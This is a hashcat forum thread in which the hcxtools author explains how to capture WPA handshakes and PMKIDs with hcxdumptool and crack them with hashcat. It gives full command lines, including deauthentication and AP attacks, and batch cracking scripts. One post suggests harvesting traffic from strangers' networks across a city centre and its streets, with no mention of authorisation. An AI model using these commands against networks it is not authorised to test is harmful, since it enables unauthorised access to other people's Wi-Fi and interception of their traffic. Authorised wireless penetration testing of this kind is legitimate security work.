hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - Printable Version +- hashcat Forum (https://hashcat.net/forum) +-- Forum: Misc (https://hashcat.net/forum/forum-15.html) +--- Forum: User Contributions (https://hashcat.net/forum/forum-25.html) +--- Thread: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats (/thread-6661.html) |
RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-04-2019 It is important to collect the -E and -I lists to an archive list! It is important to add collect PMKIDs (.16800) and EAPOLs (hccapx) to archive hash lists! And it is important to run .16800 archive and hccapx archive at regular intervals against this -E -I list! BTW: Please let me know, if you got your first hit. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - powermi - 06-04-2019 Thanks, I duplicated the line 1/2 cause as I saw HEX[xxxx] I suspected that could be a PSK, but didn't know that Hashcat could process it as a possible key. So would it make more sense to convert to .2500 instead .16800 the output file? I'll research more about the difference in between both. Seems that's a great task for a raspberry to be listening 24/7 with hcxtools. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-04-2019 You should do both (convert to .2500 and .16800) and run -E and -I list on them. But, yes, it make more sense to run -E and -I against .2500 It also depends on what you want. Let's run through the following "theoretical" example: Capture as much traffic as possible in the city centre on rush hour to get PSKs from clients. Then do a ride / walk through all the streets and get PMKIDs. Cat all -z, -o to hash files and -E -I to word list. Run the word list against the hashes. Will say: hcxdumptool/hcxtools offers numerous application possibilities, when running on a Raspberry. See Penetration testing system 1 ... 5: https://github.com/ZerBea/hcxdumptool/wiki RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-05-2019 hcxpsktool is a powerful tool in combination with hashcat. To improve speed on large hash files, it should be wrapped by a script: hash mode 2500: wlanhcx2ssid -i "$HOME/.....path_to your hashfile.hccapx" -e for HCXTMP in `find -type f -name "*.hccapx"` do ls *.hccapx | wc hcxpsktool -i "$HCXTMP" -o test.list hashcat -m 2500 --self-test-disable --advice-disable --logfile-disable -w 3 --nonce-error-corrections=32 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HCXTMP" test.list rm "$HCXTMP" rm test.list done The same aply to hash mode 16800: while HASHLINE='' read -r line || [[ -n "$line" ]] do HASHNAME=`echo "$line" | awk 'BEGIN { FS = ":" } ; { print $4 }'` echo "$line" >> "$HASHNAME.16800" done < "$HOME/.....path_to your hashfile .16800" for HCXTMP in `find -type f -name "*.16800"` do ls *.16800 | wc hcxpsktool -z "$HCXTMP" > test.list hashcat -m 16800 --self-test-disable --advice-disable --logfile-disable -w 3 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HCXTMP" test.list rm "$HCXTMP" rm test.list done A good idea is to mkdir a folder and run the scripts inside the folder. If you have small GPU power, it is a good idea to sort | unique "test.list", before feeding it to hashcat. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-05-2019 hcxwltool is also a powerful tool in combination with hashcat. It is designed to run on -E and -I output of hcxpcaptool and can be wrapped by a script, too: In this example we also expect PSKs of length 10 digit. hash mode 2500 (it will work on hash mode 16800, too): hcxwltool -i "$HOME/...path to your -E / -I list" --straight > l1.tmp hcxwltool -i "$HOME/...path to your -E / -I list" --digit >> l1.tmp hcxwltool -i "$HOME/...path to your -E / -I list" --digit --length=10 >> l1.tmp hcxwltool -i "$HOME/...path to your -E / -I list" --xdigit >> l1.tmp sort l1.tmp | uniq > test.list rm l1.tmp hashcat -m 2500 --self-test-disable --advice-disable --logfile-disable -w 3 --nonce-error-corrections=32 --potfile-path="hashcat.new.pmk" -o "hashcat.new.mac" "$HOME/.....path_to your hashfile.hccapx " test.list rm test.list RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - powermi - 06-05-2019 thanks a lot for that great info. So, could you elaborate your full attack strategy for breaking PMKID captures on a new environment being located just on one spot? Im about to purchase a Raspberry Pi just for HCXTools, better to go for a zero or a full B3+? I wanna grab also an antenna to use it along a TPLink 722n. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-05-2019 1) capture traffic: new area: hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000 discovered area: hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120 2) upload data to wpa-sec: wlancap2wpasec *.pcapng 3) convert to hasfiles / wordlists or run wlanstrip: hcxpcaptool -o new.hccapx -k new.16800 -E essidlist -I identitylist -U usernameliste -P pmklist -X clientlist --md5-out=hash.4800 --netntlm=hash.5500 *.* 4) pipe hcxpsktool, hcxwltool output to hashcat and run them against the hashes. or run hcxallneu (or hcx2500neu or hcx16800neu 5) wait until wpa-sec finished, download cracked.txt and rkg.txt and run them against your hashes 6) loop into 1 to capture new traffic Attached the scipts and rules to build up a complete environment. You just need to change the path. Also you need 2 wordlists (names [namen] and month [monate]) scripts&rules.zip (Size: 4.98 KB / Downloads: 24) Don't wonder about the high value of nonce-error-corrections, but I have to analyze really, really ugly cap files. On hcxdumdptool pcapng files you can set it to 0, 1 or 2. Unfortunately I have no strategy to break a single network, because I'm not interested in breaking single networks. Goal is to find a weak point within the system. BTW: A Raspberry Zero WH is the best choise. Low power consumption and small size. Onboard WiFi soc is really, really ugly in combination with hcxdumptool. Penetration testing systems 3, 4, 5 are line of sight (LOS) systems with extreme long range capabilites. Do not run a high power WiFi dongle - a hygain antenna in combination with a low power dongle is much better. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-06-2019 If you're only interested to run the Raspberry as capture / conversion engine, I recommend to install Arch. Do not install "K*A*L*I", because it is substantially oversized! Attached a small howto: how_to_Arch.zip (Size: 1.65 KB / Downloads: 9) More help here: https://wiki.archlinux.org/index.php/installation_guide RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - powermi - 06-06-2019 Thanks a lot for the detailed answer. Why do you use -k instead -z to get the .16800? Could you describe the different arguments execute on hcxdumptool? Some are unknown for me . I'm thinking using a regular Debian based distro for raspberry. I'll start with a model B + TPlink722n + 10db panel antenna. RE: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats - ZerBea - 06-06-2019 -z old hashcat separator * (also used by JtR) -k new hashcat separator : hashcat accept both, because it has a build in fallback to the old format. The new one is used in potfile and outfile by hashcat. Some tests (hcxdumptool -i interface --do_rcascan + 10 dBi panel antenna): TP-LINK TL-WN722N v1 ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n INFO: cha=6, rx=8476, rx(dropped)=0, tx=250, err=0, aps=29 (19 in range) TP-LINK Archer T2UH ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter INFO: cha=4, rx=5897, rx(dropped)=0, tx=225, err=0, aps=40 (24 in range) TENDA W311U+ INFO: cha=11, rx=4937, rx(dropped)=0, tx=224, err=0, aps=48 (20 in range) ALFA AWUS036H ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter INFO: cha=6, rx=1699, rx(dropped)=0, tx=113, err=0, aps=33 (19 in range) Unfortunately some other devices are not working (any longer) due to a kernel issue (not fixed, yet): https://bugzilla.kernel.org/show_bug.cgi?id=202541 BTW: Only TP-Link TL-WN722N v1 is working like expected https://wikidevi.com/wiki/TP-LINK_TL-WN722N_v1.x A panel is a good choice (TP-Link TL-ANT2414A and TL-ANT2409A working fine). |